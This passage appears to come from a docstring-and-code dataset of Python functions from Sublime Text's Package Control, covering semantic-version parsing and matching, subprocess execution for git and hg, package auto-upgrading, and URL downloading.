        raise TypeError(('SemVer accepts at least 1 and at most 5 arguments (%d given)' % l))
    elif (l < 3):
        # Option 1: version string plus optional clean flag
        if (len(args) == 2):
            (ver, clean) = args
        else:
            ver = (args[0] if args else kw.pop('ver', None))
            clean = kw.pop('clean', clean)
            if kw:
                # Leftover keyword args mean an invalid combination
                inv()
    else:
        # Option 2: positional components, the remainder filled from
        # kwargs by field name in declaration order
        comps = (list(args) + [kw.pop(cls._fields[k], None) for k in range(len(args), 5)])
        if (kw or any(((comps[i] is None) for i in range(3)))):
            # major, minor and patch are all required
            inv()
        typecheck = (((int,) * 3) + ((basestring,) * 2))
        for (i, (v, t)) in enumerate(zip(comps, typecheck)):
            if (v is None):
                continue
            elif (not isinstance(v, t)):
                # Convert: ints for the numeric components, str otherwise
                try:
                    if (i < 3):
                        v = typecheck[i](v)
                    else:
                        v = str(v)
                except ValueError as e:
                    e.args = (('Parameter #%d must be of type %s or convertable' % (i, t.__name__)),)
                    raise
                else:
                    comps[i] = v
            if ((t is basestring) and (not re.match('^[0-9A-Za-z.-]*$', v))):
                raise ValueError("Build and pre-release strings must match '^[0-9A-Za-z.-]*$'")

    if (not comps):
        # Option 1: optionally clean, then parse the version string
        if ((ver is None) or (clean is None)):
            inv()
        ver = ((clean and cls.clean(ver)) or ver)
        comps = cls._parse(ver)

    return super(SemVer, cls).__new__(cls, *comps)
|
'Alias for `bool(sel.matches(self))` or `bool(SemSel(sel).matches(self))`.
See `SemSel.__init__()` and `SemSel.matches(*vers)` for possible exceptions.
Returns:
* bool: `True` if the version matches the passed selector, `False` otherwise.'
def satisfies(self, sel):
    """
    Alias for `bool(sel.matches(self))` or `bool(SemSel(sel).matches(self))`.

    See `SemSel.__init__()` and `SemSel.matches(*vers)` for possible
    exceptions.

    :return:
        `True` if the version matches the passed selector, `False` otherwise.
    """
    selector = sel if isinstance(sel, SemSel) else SemSel(sel)
    return bool(selector.matches(self))
|
'Check if `ver` is a valid semantic version. Classmethod.
Parameters:
* ver (str)
The string that should be stripped.
Raises:
* TypeError
Invalid parameter type.
Returns:
* bool: `True` if it is valid, `False` otherwise.'
@classmethod
def valid(cls, ver):
    """
    Check if `ver` is a valid semantic version. Classmethod.

    :param ver:
        The string to validate.

    :raises TypeError:
        Invalid parameter type.

    :return:
        `True` if it is valid, `False` otherwise.
    """
    if not isinstance(ver, basestring):
        raise TypeError('%r is not a string' % ver)
    # Idiom fix: return the boolean directly instead of an if/else
    # that returns True/False
    return cls._match_regex.match(ver) is not None
|
'Remove everything before and after a valid version string. Classmethod.
Parameters:
* vers (str)
The string that should be stripped.
Raises:
* TypeError
Invalid parameter type.
Returns:
* str: The stripped version string. Only the first version is matched.
* None: No version found in the string.'
@classmethod
def clean(cls, vers):
    """
    Remove everything before and after a valid version string. Classmethod.

    :param vers:
        The string that should be stripped.

    :raises TypeError:
        Invalid parameter type.

    :return:
        The stripped version string (only the first version is matched),
        or None when no version was found.
    """
    if not isinstance(vers, basestring):
        raise TypeError('%r is not a string' % vers)
    match = cls._search_regex.search(vers)
    return vers[match.start():match.end()] if match else None
|
'Private. Do not touch. Classmethod.'
@classmethod
def _parse(cls, ver):
    """
    Private. Do not touch. Classmethod.

    Splits `ver` into its components, converting the first three
    (major, minor, patch) to ints.
    """
    if not isinstance(ver, basestring):
        raise TypeError('%r is not a string' % ver)

    match = cls._match_regex.match(ver)
    if not match:
        raise ValueError("'%s' is not a valid SemVer string" % ver)

    components = list(match.groups())
    components[:3] = [int(part) for part in components[:3]]
    return components
|
'Private. Do not touch.
self > other: 1
self = other: 0
self < other: -1'
def _compare(self, other):
    """Private. Do not touch.

    Three-way comparison helper:
        self > other -> 1, self == other -> 0, self < other -> -1

    Components 0-2 (major, minor, patch) compare directly; components 3
    (pre-release) and 4 (build) follow semver precedence rules.
    """
    def cp_len(t, i=0):
        # Three-way compare the lengths of the two identifier lists
        return cmp(len(t[i]), len(t[(not i)]))
    for (i, (x1, x2)) in enumerate(zip(self, other)):
        if (i > 2):
            # Optional string components: pre-release (i == 3), build (i == 4)
            if ((x1 is None) and (x2 is None)):
                continue
            if ((x1 is None) or (x2 is None)):
                # A present pre-release sorts lower than an absent one, a
                # present build sorts higher; (i - 3.5) flips the sign
                # between the two cases
                return (int((2 * (i - 3.5))) * (1 - (2 * (x1 is None))))
            if ((i == 4) and ((not x1) or (not x2)) and (x1 != x2)):
                # An empty build string sorts below a non-empty one
                return (1 - (2 * bool(x1)))
            # Compare dot-separated identifiers pairwise
            t2 = [x1.split('.'), x2.split('.')]
            for (y1, y2) in zip(*t2):
                if (y1.isdigit() and y2.isdigit()):
                    # Numeric identifiers compare as integers
                    y1 = int(y1)
                    y2 = int(y2)
                if (y1 > y2):
                    return 1
                elif (y1 < y2):
                    return (-1)
            # All shared identifiers equal: the longer identifier list wins
            d = cp_len(t2)
            if d:
                return d
        elif (x1 > x2):
            return 1
        elif (x1 < x2):
            return (-1)
    return 0
|
'Constructor examples:
SemComparator(\'<=\', SemVer("1.2.3"))
SemComparator(\'!=\', SemVer("2.3.4"))
Parameters:
* op (str, False, None)
One of [>=, <=, >, <, =, !=, !, ~] or evaluates to `False` which defaults to \'~\'.
\'~\' means a "satisfy" operation where pre-releases and builds are ignored.
\'!\' is a negative "~".
* ver (SemVer)
Holds the version to compare with.
Raises:
* ValueError
Invalid `op` parameter.
* TypeError
Invalid `ver` parameter.'
def __init__(self, op, ver):
    """Comparator of one operator and one version, e.g. ('<=', SemVer("1.2.3")).

    :param op:
        One of >=, <=, >, <, =, !=, !, ~ or a false-y value, which defaults
        to '~'. '~' is a "satisfy" match ignoring pre-release and build;
        '!' is its negation.
    :param ver:
        The SemVer instance to compare against.
    :raises ValueError:
        Invalid `op` parameter.
    :raises TypeError:
        Invalid `ver` parameter.
    """
    super(SemComparator, self).__init__()
    op_is_known = (not op) or (op in self._ops_satisfy) or (op in self._ops)
    if not op_is_known:
        raise ValueError('Invalid value for `op` parameter.')
    if not isinstance(ver, SemVer):
        raise TypeError('`ver` parameter is not instance of SemVer.')
    op = op or '~'
    if len(ver) != 3:
        # Versions with pre-release/build parts can not be fuzzy-matched;
        # degrade the satisfy operators to plain (in)equality
        if op == '~':
            op = '='
        if op == '!':
            op = '!='
    self.op = op
    self.ver = ver
|
'Match the internal version (constructor) against `ver`.
Parameters:
* ver (SemVer)
Raises:
* TypeError
Could not compare `ver` against the version passed in the constructor with the
passed operator.
Returns:
* bool
`True` if the version matched the specified operator and internal version, `False`
otherwise.'
def matches(self, ver):
    """Match the version passed to the constructor against `ver`.

    :param ver:
        A SemVer instance
    :raises TypeError:
        `ver` could not be compared with the stored operator
    :return:
        True if `ver` satisfies the stored operator and version
    """
    if self.op in self._ops_satisfy:
        # '~' matches when the first three components are equal;
        # '!' negates that (the subtraction yields -1, 0 or 1)
        is_same = self.ver[:3] == ver[:3]
        return bool(is_same - (self.op == '!'))
    outcome = getattr(ver, self._ops[self.op])(self.ver)
    if outcome == NotImplemented:
        raise TypeError("Unable to compare %r with operator '%s'" % (ver, self.op))
    return outcome
|
'Match all of the added children against `ver`.
Parameters:
* ver (SemVer)
Raises:
* TypeError
Invalid `ver` parameter.
Returns:
* bool:
`True` if *all* of the SemComparator children match `ver`, `False` otherwise.'
def matches(self, ver):
    """Return True only when every comparator in this AND-chunk accepts `ver`.

    :param ver:
        A SemVer instance
    :raises TypeError:
        Invalid `ver` parameter.
    """
    if not isinstance(ver, SemVer):
        raise TypeError('`ver` parameter is not instance of SemVer.')
    for comparator in self:
        if not comparator.matches(ver):
            return False
    return True
|
'Create a SemComparator instance with the given parameters and appends that to self.
Parameters:
* op (str)
* ver (SemVer)
Both parameters are forwarded to `SemComparator.__init__`, see there for a more detailed
description.
Raises:
Exceptions raised by `SemComparator.__init__`.'
def add_child(self, op, ver):
    """Append a SemComparator built from `op` and `ver` (coerced to SemVer).

    Exceptions from `SemComparator.__init__` and `SemVer` propagate.
    """
    comparator = SemComparator(op, SemVer(ver))
    self.append(comparator)
|
'Match all of the added children against `ver`.
Parameters:
* ver (SemVer)
Raises:
* TypeError
Invalid `ver` parameter.
Returns:
* bool
`True` if *any* of the SemSelAndChunk children matches `ver`.
`False` otherwise.'
def matches(self, ver):
    """Return True when at least one AND-chunk in this OR-chunk accepts `ver`.

    :param ver:
        A SemVer instance
    :raises TypeError:
        Invalid `ver` parameter.
    """
    if not isinstance(ver, SemVer):
        raise TypeError('`ver` parameter is not instance of SemVer.')
    for chunk in self:
        if chunk.matches(ver):
            return True
    return False
|
'Creates a new SemSelAndChunk instance, appends it to self and returns it.
Returns:
* SemSelAndChunk: An empty instance.'
def new_child(self):
    """Append a fresh, empty SemSelAndChunk to self and return it."""
    child = SemSelAndChunk()
    self.append(child)
    return child
|
'Constructor examples:
SemSel(">1.0.0")
SemSel("~1.2.9 !=1.2.12")
Parameters:
* sel (str)
A version selector string.
Raises:
* TypeError
`sel` parameter is not a string.
* ValueError
A version in the selector could not be matched as a SemVer.
* SemParseError
The version selector\'s syntax is unparsable; invalid ranges (fuzzy, xrange or
explicit range) or invalid \'||\''
def __new__(cls, sel):
    """Construct a SemSel from a selector string such as ">1.0.0".

    Exceptions from `_parse()` (TypeError, ValueError, SelParseError)
    propagate to the caller.
    """
    parsed_chunk = cls._parse(sel)
    return super(SemSel, cls).__new__(cls, (parsed_chunk,))
|
'Match the selector against a selection of versions.
Parameters:
* *vers (str, SemVer)
Versions can be passed as strings and SemVer objects will be created with them.
May also be a mixed list.
Raises:
* TypeError
A version is not an instance of str (basestring) or SemVer.
* ValueError
A string version could not be parsed as a SemVer.
Returns:
* list
A list with all the versions that matched, may be empty. Use `max()` to determine
the highest matching version, or `min()` for the lowest.'
def matches(self, *vers):
    """Match the selector against a selection of versions.

    :param vers:
        Versions as strings (parsed into SemVer) and/or SemVer instances.
    :raises TypeError:
        A version is neither a string nor a SemVer.
    :raises ValueError:
        A string version could not be parsed as a SemVer.
    :return:
        The (possibly empty) list of versions that matched, in input order.
    """
    matched = []
    for candidate in vers:
        if isinstance(candidate, str):
            accepted = self._chunk.matches(SemVer(candidate))
        elif isinstance(candidate, SemVer):
            accepted = self._chunk.matches(candidate)
        else:
            raise TypeError("Invalid parameter type '%s': %s" % (candidate, type(candidate)))
        if accepted:
            matched.append(candidate)
    return matched
|
'Private. Do not touch.
1. split by whitespace into tokens
a. start new and_chunk on \' || \'
b. parse " - " ranges
c. replace "xX*" ranges with "~" equivalent
d. parse "~" ranges
e. parse unmatched token as comparator
~. append to current and_chunk
2. return SemSelOrChunk
Raises TypeError, ValueError or SelParseError.'
@classmethod
def _parse(cls, sel):
    """Private. Do not touch. Parse selector string `sel` into a SemSelOrChunk.

    1. split by whitespace into tokens
       a. start new and_chunk on ' || '
       b. parse " - " ranges
       c. replace "xX*" ranges with "~" equivalent
       d. parse "~" ranges
       e. parse unmatched token as comparator
       ~. append to current and_chunk
    2. return SemSelOrChunk

    Raises TypeError, ValueError or SelParseError.
    """
    if (not isinstance(sel, basestring)):
        raise TypeError('Selector must be a string')
    if (not sel):
        raise ValueError('String must not be empty')
    tokens = sel.split()
    i = (-1)
    or_chunk = SemSelOrChunk()
    and_chunk = or_chunk.new_child()
    while ((i + 1) < len(tokens)):
        i += 1
        t = tokens[i]
        # Rewrite XRange shorthands ("1.x", "1.2.*", ...) as "~" ranges
        m = cls._xrange_regex.match(t)
        m = (m and m.groups(''))
        if (m and any(((not x.isdigit()) for x in m[1:4])) and (not m[0].startswith('>'))):
            if m[4]:
                raise SelParseError('XRanges do not allow pre-release or build components')
            (mm, xran) = ([], False)
            for x in m[1:4]:
                if x.isdigit():
                    # A digit after a wildcard (e.g. "1.x.2") is invalid
                    if xran:
                        raise SelParseError(("Invalid fuzzy range or XRange '%s'" % tokens[i]))
                    mm.append(x)
                else:
                    xran = True
            t = (m[0] + '.'.join(mm))
            if (not t.startswith('~')):
                t = ('~' + t)
        if (t == '||'):
            if ((i == 0) or (tokens[(i - 1)] == '||') or ((i + 1) == len(tokens))):
                raise SelParseError('OR range must not be empty')
            and_chunk = or_chunk.new_child()
        elif (t == '-'):
            # "a - b" range: rewrite the previous comparator to ">=a" and
            # append "<=b"
            i += 1
            invalid = False
            try:
                t = tokens[i]
                c = and_chunk[(-1)]
            except:
                raise SelParseError("Invalid ' - ' range position")
            invalid = ((c.op not in ('=', '~')) or (cls._split_op_regex.match(t).group(1) not in (None, '=')))
            if invalid:
                raise SelParseError(("Invalid ' - ' range '%s - %s'" % (tokens[(i - 2)], tokens[i])))
            c.op = '>='
            and_chunk.add_child('<=', t)
        elif (t == ''):
            pass
        elif t.startswith('~'):
            m = cls._fuzzy_regex.match(t)
            if (not m):
                raise SelParseError(("Invalid fuzzy range or XRange '%s'" % tokens[i]))
            (mm, m) = (m.groups('')[1:4], m.groupdict(''))
            # BUGFIX: a compiled regex object is not callable; the original
            # `cls._split_op_regex(t[1:])` raised TypeError whenever the
            # fuzzy token carried an explicit "other" version - it must be
            # invoked via .match()
            min_ver = (('.'.join(((x or '0') for x in mm)) + '-') if (not m['other']) else cls._split_op_regex.match(t[1:]).group('ver'))
            and_chunk.add_child('>=', min_ver)
            if m['major']:
                # Upper bound: increment the last specified component
                e = [0, 0, 0]
                for (j, d) in enumerate(mm):
                    if ((not d) or (j == (len(mm) - 1))):
                        e[(j - 1)] = (e[(j - 1)] + 1)
                        break
                    e[j] = int(d)
                and_chunk.add_child('<', ('.'.join((str(x) for x in e)) + '-'))
        else:
            # Plain comparator token, e.g. ">=1.2.3" or "1.0.0"
            m = cls._split_op_regex.match(t).groupdict()
            and_chunk.add_child(**m)
    return or_chunk
|
'Creates a subprocess with the executable/args
:param args:
A list of the executable path and all arguments to it
:param cwd:
The directory in which to run the executable
:param input:
The input text to send to the program
:param meaningful_output:
If the output from the command is possibly meaningful and should
be displayed if in debug mode
:param ignore_errors:
A regex of errors to ignore
:return:
A string of the executable output or False on error'
def execute(self, args, cwd, input=None, encoding='utf-8', meaningful_output=False, ignore_errors=None):
    """Creates a subprocess with the executable/args

    :param args:
        A list of the executable path and all arguments to it
    :param cwd:
        The directory in which to run the executable
    :param input:
        The input text to send to the program
    :param encoding:
        The encoding used for the process' stdin/stdout
    :param meaningful_output:
        If the output from the command is possibly meaningful and should
        be displayed if in debug mode
    :param ignore_errors:
        A regex of errors to ignore
    :return:
        A string of the executable output or False on error
    """
    orig_cwd = cwd
    startupinfo = None
    if os.name == 'nt':
        # Prevent a console window from flashing on Windows
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
        # Fall back to the 8.3 short path when the cwd is not
        # representable in the mbcs codepage
        try:
            cwd.encode('mbcs')
        except UnicodeEncodeError:
            buf = create_unicode_buffer(512)
            if windll.kernel32.GetShortPathNameW(cwd, buf, len(buf)):
                cwd = buf.value
    if self.debug:
        console_write(u'\n Executing %s [%s]\n ', (create_cmd(args), cwd))
    try:
        if sys.platform == 'win32' and sys.version_info < (3,):
            cwd = cwd.encode('mbcs')
        proc = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, startupinfo=startupinfo, cwd=cwd, env=os.environ)
        if input and isinstance(input, str_cls):
            input = input.encode(encoding)
        stuck = True
        # BUGFIX: is_vcs was only assigned when the binary name matched git
        # or hg, causing a NameError below for any other binary; default it
        is_vcs = False
        binary_name = os.path.basename(args[0])
        if re.search('git', binary_name):
            is_vcs = True
        elif re.search('hg', binary_name):
            is_vcs = True
        if sublime:
            # Kill the process if still running after 60 seconds - usually
            # a VCS binary blocking on a password/passphrase prompt
            def kill_proc():
                if not stuck:
                    return
                proc.kill()
                message = text.format(u'\n The process %s seems to have gotten stuck.\n\n Command: %s\n\n Working directory: %s\n ', (binary_name, create_cmd(args), orig_cwd))
                if is_vcs:
                    message += text.format(u'\n\n This is likely due to a password or passphrase\n prompt. Please ensure %s works without a prompt, or\n change the "ignore_vcs_packages" Package Control\n setting to true.\n\n Sublime Text will need to be restarted once these\n changes are made.\n ', binary_name)
                show_error(message)
            sublime.set_timeout(kill_proc, 60000)
        (output, _) = proc.communicate(input)
        stuck = False
        output = output.decode(encoding)
        output = output.replace('\r\n', '\n').rstrip(' \n\r')
        if proc.returncode not in self.ok_returncodes:
            # Errors matching ignore_errors are treated as success
            if not ignore_errors or re.search(ignore_errors, output) is None:
                message = text.format(u'\n Error executing: %s\n\n Working directory: %s\n\n %s\n ', (create_cmd(args), orig_cwd, output))
                if is_vcs:
                    message += text.format('\n\n VCS-based packages can be ignored by changing the\n "ignore_vcs_packages" setting to true.\n\n Sublime Text will need to be restarted once the\n setting is changed.\n ')
                show_error(message)
                return False
        if meaningful_output and self.debug and len(output) > 0:
            console_write(output, indent=' ', prefix=False)
        return output
    except OSError as e:
        show_error(u'\n Error executing: %s\n\n %s\n\n Try checking your "%s_binary" setting?\n ', (create_cmd(args), unicode_from_os(e), self.cli_name))
        return False
|
'Locates the executable by looking in the PATH and well-known directories
:param name:
The string filename of the executable
:return:
The filesystem path to the executable, or None if not found'
def find_binary(self, name):
    """Locates the executable by looking in the PATH and well-known directories

    :param name:
        The string filename of the executable

    :return:
        The filesystem path to the executable, or None if not found
    """
    # Serve from the per-class cache so the filesystem is scanned only once
    if (self.cli_name in Cli.binary_paths):
        return Cli.binary_paths[self.cli_name]
    check_binaries = []
    # User-configured locations take precedence over the PATH
    if self.binary_locations:
        if (not isinstance(self.binary_locations, list)):
            self.binary_locations = [self.binary_locations]
        check_binaries.extend(self.binary_locations)
    # Every directory on the PATH
    for dir_ in os.environ['PATH'].split(os.pathsep):
        check_binaries.append(os.path.join(dir_, name))
    # Common per-platform install locations for git/hg clients
    if (os.name == 'nt'):
        dirs = ['C:\\Program Files\\Git\\bin', 'C:\\Program Files (x86)\\Git\\bin', 'C:\\Program Files\\TortoiseGit\\bin', 'C:\\Program Files\\Mercurial', 'C:\\Program Files (x86)\\Mercurial', 'C:\\Program Files (x86)\\TortoiseHg', 'C:\\Program Files\\TortoiseHg', 'C:\\cygwin\\bin']
    else:
        dirs = ['/usr/local/git/bin', '/usr/local/bin']
    for dir_ in dirs:
        check_binaries.append(os.path.join(dir_, name))
    if self.debug:
        console_write(u'\n Looking for %s at: "%s"\n ', (self.cli_name, '", "'.join(check_binaries)))
    for path in check_binaries:
        # Candidate must exist, not be a directory and be executable
        if (os.path.exists(path) and (not os.path.isdir(path)) and os.access(path, os.X_OK)):
            if self.debug:
                console_write(u'\n Found %s at "%s"\n ', (self.cli_name, path))
            Cli.binary_paths[self.cli_name] = path
            return path
    if self.debug:
        console_write(u'\n Could not find %s on your machine\n ', self.cli_name)
    return None
|
':param found_packages:
A list of package names for the packages that were found to be
installed on the machine.
:param found_dependencies:
A list of installed dependencies found on the machine'
def __init__(self, found_packages, found_dependencies):
    """
    :param found_packages:
        A list of package names for the packages that were found to be
        installed on the machine.

    :param found_dependencies:
        A list of installed dependencies found on the machine
    """
    self.installer = PackageInstaller()
    self.manager = self.installer.manager
    self.load_settings()
    self.package_renamer = PackageRenamer()
    self.package_renamer.load_settings()
    self.auto_upgrade = self.settings.get('auto_upgrade')
    self.auto_upgrade_ignore = self.settings.get('auto_upgrade_ignore')
    self.load_last_run()
    self.determine_next_run()
    # Packages recorded in settings but absent from disk
    self.missing_packages = list((set(self.installed_packages) - set(found_packages)))
    # Dependencies required by installed packages but absent from disk
    self.missing_dependencies = list((set(self.manager.find_required_dependencies()) - set(found_dependencies)))
    # Record the run time up front so a crash mid-upgrade does not cause
    # an immediate re-run on next start
    if (self.auto_upgrade and (self.next_run <= time.time())):
        self.save_last_run(time.time())
    threading.Thread.__init__(self)
|
'Loads the last run time from disk into memory'
def load_last_run(self):
    """Loads the last run time from disk into memory"""
    self.last_run = None
    self.last_run_file = os.path.join(sublime.packages_path(), 'User', 'Package Control.last-run')
    if os.path.isfile(self.last_run_file):
        with open_compat(self.last_run_file) as fobj:
            try:
                self.last_run = int(read_compat(fobj))
            except ValueError:
                # Corrupt or non-numeric contents - treat as never run
                pass
|
'Figure out when the next run should happen'
def determine_next_run(self):
    """Figure out when the next run should happen.

    Sets `self.next_run` to a unix timestamp (int): with an
    `auto_upgrade_frequency` setting (in hours) and a recorded last run,
    the next run is last_run + frequency; otherwise upgrades may run
    immediately.
    """
    self.next_run = int(time.time())
    frequency = self.settings.get('auto_upgrade_frequency')
    if frequency:
        if self.last_run:
            self.next_run = int(self.last_run) + (frequency * 60 * 60)
        else:
            # Keep the timestamp an int for consistency with the other
            # branches (the original assigned a float here)
            self.next_run = int(time.time())
|
'Saves a record of when the last run was
:param last_run:
The unix timestamp of when to record the last run as'
def save_last_run(self, last_run):
    """Saves a record of when the last run was

    :param last_run:
        The unix timestamp of when to record the last run as
    """
    with open_compat(self.last_run_file, 'w') as fobj:
        # Stored as an int so load_last_run() can parse it back
        write_compat(fobj, int(last_run))
|
'Loads the list of installed packages'
def load_settings(self):
    """Loads the list of installed packages.

    Reads the `installed_packages` list and the `install_missing` flag
    from Package Control's settings file.
    """
    self.settings = sublime.load_settings(pc_settings_filename())
    self.installed_packages = load_list_setting(self.settings, 'installed_packages')
    self.should_install_missing = self.settings.get('install_missing')
|
'Installs all packages that were listed in the list of
`installed_packages` from Package Control.sublime-settings but were not
found on the filesystem and passed as `found_packages`. Also installs
any missing dependencies.'
def install_missing(self):
    """Installs all packages that were listed in the list of
    `installed_packages` from Package Control.sublime-settings but were not
    found on the filesystem and passed as `found_packages`. Also installs
    any missing dependencies.
    """
    if self.missing_dependencies:
        total_missing_dependencies = len(self.missing_dependencies)
        dependency_s = ('ies' if (total_missing_dependencies != 1) else 'y')
        console_write(u'\n Installing %s missing dependenc%s\n ', (total_missing_dependencies, dependency_s))
        dependencies_installed = 0
        for dependency in self.missing_dependencies:
            if self.installer.manager.install_package(dependency, is_dependency=True):
                console_write(u'Installed missing dependency %s', dependency)
                dependencies_installed += 1
        if dependencies_installed:
            # Dependencies are loaded at startup, so a restart is required
            def notify_restart():
                dependency_was = ('ies were' if (dependencies_installed != 1) else 'y was')
                show_error(u'\n %s missing dependenc%s just installed. Sublime Text\n should be restarted, otherwise one or more of the\n installed packages may not function properly.\n ', (dependencies_installed, dependency_was))
            sublime.set_timeout(notify_restart, 1000)
    if ((not self.missing_packages) or (not self.should_install_missing)):
        return
    total_missing_packages = len(self.missing_packages)
    if (total_missing_packages > 0):
        package_s = ('s' if (total_missing_packages != 1) else '')
        console_write(u'\n Installing %s missing package%s\n ', (total_missing_packages, package_s))
    self.manager.list_available_packages()
    renamed_packages = self.manager.settings.get('renamed_packages', {})
    disabled_packages = []
    # Disabling must happen on the main thread (hence set_timeout); the
    # sleep gives Sublime Text time to ignore the packages before install
    def disable_packages():
        disabled_packages.extend(self.installer.disable_packages(self.missing_packages, 'install'))
    sublime.set_timeout(disable_packages, 1)
    time.sleep(0.7)
    for package in self.missing_packages:
        # Handle packages that were renamed upstream
        if (package in renamed_packages):
            old_name = package
            new_name = renamed_packages[old_name]
            # NOTE(review): this closure captures old_name/new_name by
            # reference; with multiple renamed packages the deferred
            # callbacks may all observe the last pair - confirm
            def update_installed_packages():
                self.installed_packages.remove(old_name)
                self.installed_packages.append(new_name)
                self.settings.set('installed_packages', self.installed_packages)
                sublime.save_settings(pc_settings_filename())
            sublime.set_timeout(update_installed_packages, 10)
            package = new_name
        if self.installer.manager.install_package(package):
            if (package in disabled_packages):
                # Re-enable on the main thread after files settle
                on_complete = functools.partial(self.installer.reenable_package, package, 'install')
                sublime.set_timeout(on_complete, 700)
            console_write(u'\n Installed missing package %s\n ', package)
|
'Prints a notice in the console if the automatic upgrade is skipped
due to already having been run in the last `auto_upgrade_frequency`
hours.'
def print_skip(self):
    """Log that the automatic upgrade was skipped because it already ran
    within the last `auto_upgrade_frequency` hours."""
    stamp_format = '%Y-%m-%d %H:%M:%S'
    previous = datetime.datetime.fromtimestamp(self.last_run)
    upcoming = datetime.datetime.fromtimestamp(self.next_run)
    console_write(u'\n Skipping automatic upgrade, last run at %s, next run at %s or after\n ', (previous.strftime(stamp_format), upcoming.strftime(stamp_format)))
|
'Upgrades all packages that are not currently upgraded to the latest
version. Also renames any installed packages to their new names.'
def upgrade_packages(self):
    """Upgrades all packages that are not currently upgraded to the latest
    version. Also renames any installed packages to their new names.
    """
    if (not self.auto_upgrade):
        return
    self.package_renamer.rename_packages(self.installer)
    package_list = self.installer.make_package_list(['install', 'reinstall', 'downgrade', 'overwrite', 'none'], ignore_packages=self.auto_upgrade_ignore)
    # If Package Control itself needs an upgrade, only upgrade it and
    # reset the last-run timestamp so remaining upgrades happen next run
    for package in package_list:
        if (package[0] != 'Package Control'):
            continue
        if self.last_run:
            def reset_last_run():
                self.save_last_run(self.last_run)
            sublime.set_timeout(reset_last_run, 1)
        package_list = [package]
        break
    if (not package_list):
        console_write(u'\n No updated packages\n ')
        return
    console_write(u'\n Installing %s upgrades\n ', len(package_list))
    disabled_packages = []
    # Disable on the main thread, then wait for Sublime Text to settle
    def disable_packages():
        packages = [info[0] for info in package_list]
        disabled_packages.extend(self.installer.disable_packages(packages, 'upgrade'))
    sublime.set_timeout(disable_packages, 1)
    time.sleep(0.7)
    for info in package_list:
        package_name = info[0]
        if self.installer.manager.install_package(package_name):
            if (package_name in disabled_packages):
                # Re-enable on the main thread after the install completes
                on_complete = functools.partial(self.installer.reenable_package, package_name, 'upgrade')
                sublime.set_timeout(on_complete, 700)
            version = self.installer.manager.get_version(package_name)
            console_write(u'\n Upgraded %s to %s\n ', (package_name, version))
|
'Downloads a URL and returns the contents
:param url:
The string URL to download
:param error_message:
The error message to include if the download fails
:param prefer_cached:
If cached version of the URL content is preferred over a new request
:raises:
DownloaderException: if there was an error downloading the URL
:return:
The string contents of the URL'
def fetch(self, url, error_message, prefer_cached=False):
    """Downloads a URL and returns the contents

    :param url:
        The string URL to download
    :param error_message:
        The error message to include if the download fails
    :param prefer_cached:
        If cached version of the URL content is preferred over a new request
    :raises:
        DownloaderException: if there was an error downloading the URL
    :return:
        The string contents of the URL
    """
    is_ssl = (re.search('^https://', url) is not None)
    url = update_url(url, self.settings.get('debug'))
    # Map sys.platform onto the keys used by "downloader_precedence"
    if (sys.platform == 'darwin'):
        platform = 'osx'
    elif (sys.platform == 'win32'):
        platform = 'windows'
    else:
        platform = 'linux'
    downloader_precedence = self.settings.get('downloader_precedence', {'windows': ['wininet'], 'osx': ['urllib'], 'linux': ['urllib', 'curl', 'wget']})
    downloader_list = downloader_precedence.get(platform, [])
    if ((not isinstance(downloader_list, list)) or (len(downloader_list) == 0)):
        error_string = text.format(u'\n No list of preferred downloaders specified in the\n "downloader_precedence" setting for the platform "%s"\n ', platform)
        show_error(error_string)
        raise DownloaderException(error_string)
    # Pick the first usable downloader; re-select if the cached downloader
    # can not handle an https URL
    if ((not self.downloader) or (is_ssl and (not self.downloader.supports_ssl()))):
        for downloader_name in downloader_list:
            if (downloader_name not in DOWNLOADERS):
                error_string = text.format(u'\n The downloader "%s" from the "downloader_precedence"\n setting for the platform "%s" is invalid\n ', (downloader_name, platform))
                show_error(error_string)
                raise DownloaderException(error_string)
            try:
                downloader = DOWNLOADERS[downloader_name](self.settings)
                if (is_ssl and (not downloader.supports_ssl())):
                    continue
                self.downloader = downloader
                break
            except BinaryNotFoundError:
                # curl/wget executable missing - try the next downloader
                pass
    if (not self.downloader):
        error_string = text.format(u'\n None of the preferred downloaders can download %s.\n\n This is usually either because the ssl module is unavailable\n and/or the command line curl or wget executables could not be\n found in the PATH.\n\n If you customized the "downloader_precedence" setting, please\n verify your customization.\n ', url)
        show_error(error_string)
        raise DownloaderException(error_string.replace('\n\n', ' '))
    url = url.replace(' ', '%20')
    hostname = urlparse(url).hostname
    if hostname:
        hostname = hostname.lower()
    timeout = self.settings.get('timeout', 3)
    rate_limited_domains = get_cache('rate_limited_domains', [])
    if self.settings.get('debug'):
        # Resolve and log the IPs being connected to, for debugging
        try:
            port = (443 if is_ssl else 80)
            ipv6_info = socket.getaddrinfo(hostname, port, socket.AF_INET6)
            if ipv6_info:
                ipv6 = ipv6_info[0][4][0]
            else:
                ipv6 = None
        except socket.gaierror as e:
            ipv6 = None
        except TypeError as e:
            ipv6 = None
        try:
            ip = socket.gethostbyname(hostname)
        except socket.gaierror as e:
            # Record the resolution error text in place of an address
            ip = unicode_from_os(e)
        except TypeError as e:
            ip = None
        console_write(u'\n Download Debug\n URL: %s\n Timeout: %s\n Resolved IP: %s\n ', (url, str_cls(timeout), ip))
        if ipv6:
            console_write(u' Resolved IPv6: %s', ipv6, prefix=False)
    if (hostname in rate_limited_domains):
        # Skip hosts that previously returned a rate-limit response
        error_string = (u'Skipping due to hitting rate limit for %s' % hostname)
        if self.settings.get('debug'):
            console_write(u' %s', error_string, prefix=False)
        raise DownloaderException(error_string)
    try:
        return self.downloader.download(url, error_message, timeout, 3, prefer_cached)
    except RateLimitException as e:
        # Remember the domain so later requests are skipped for a while
        rate_limited_domains.append(hostname)
        set_cache('rate_limited_domains', rate_limited_domains, self.settings.get('cache_length'))
        console_write(u'\n Hit rate limit of %s for %s. Skipping all futher download\n requests for this domain.\n ', (e.limit, e.domain))
        raise
    except WinDownloaderException as e:
        # WinINet failed - retry once with the urllib downloader, carrying
        # over any proxy configuration WinINet discovered
        console_write(u'\n Attempting to use Urllib downloader due to WinINet error: %s\n ', e)
        wininet_proxy = (self.downloader.proxy or '')
        wininet_proxy_username = (self.downloader.proxy_username or '')
        wininet_proxy_password = (self.downloader.proxy_password or '')
        http_proxy = self.settings.get('http_proxy', '')
        https_proxy = self.settings.get('https_proxy', '')
        proxy_username = self.settings.get('proxy_username', '')
        proxy_password = self.settings.get('proxy_password', '')
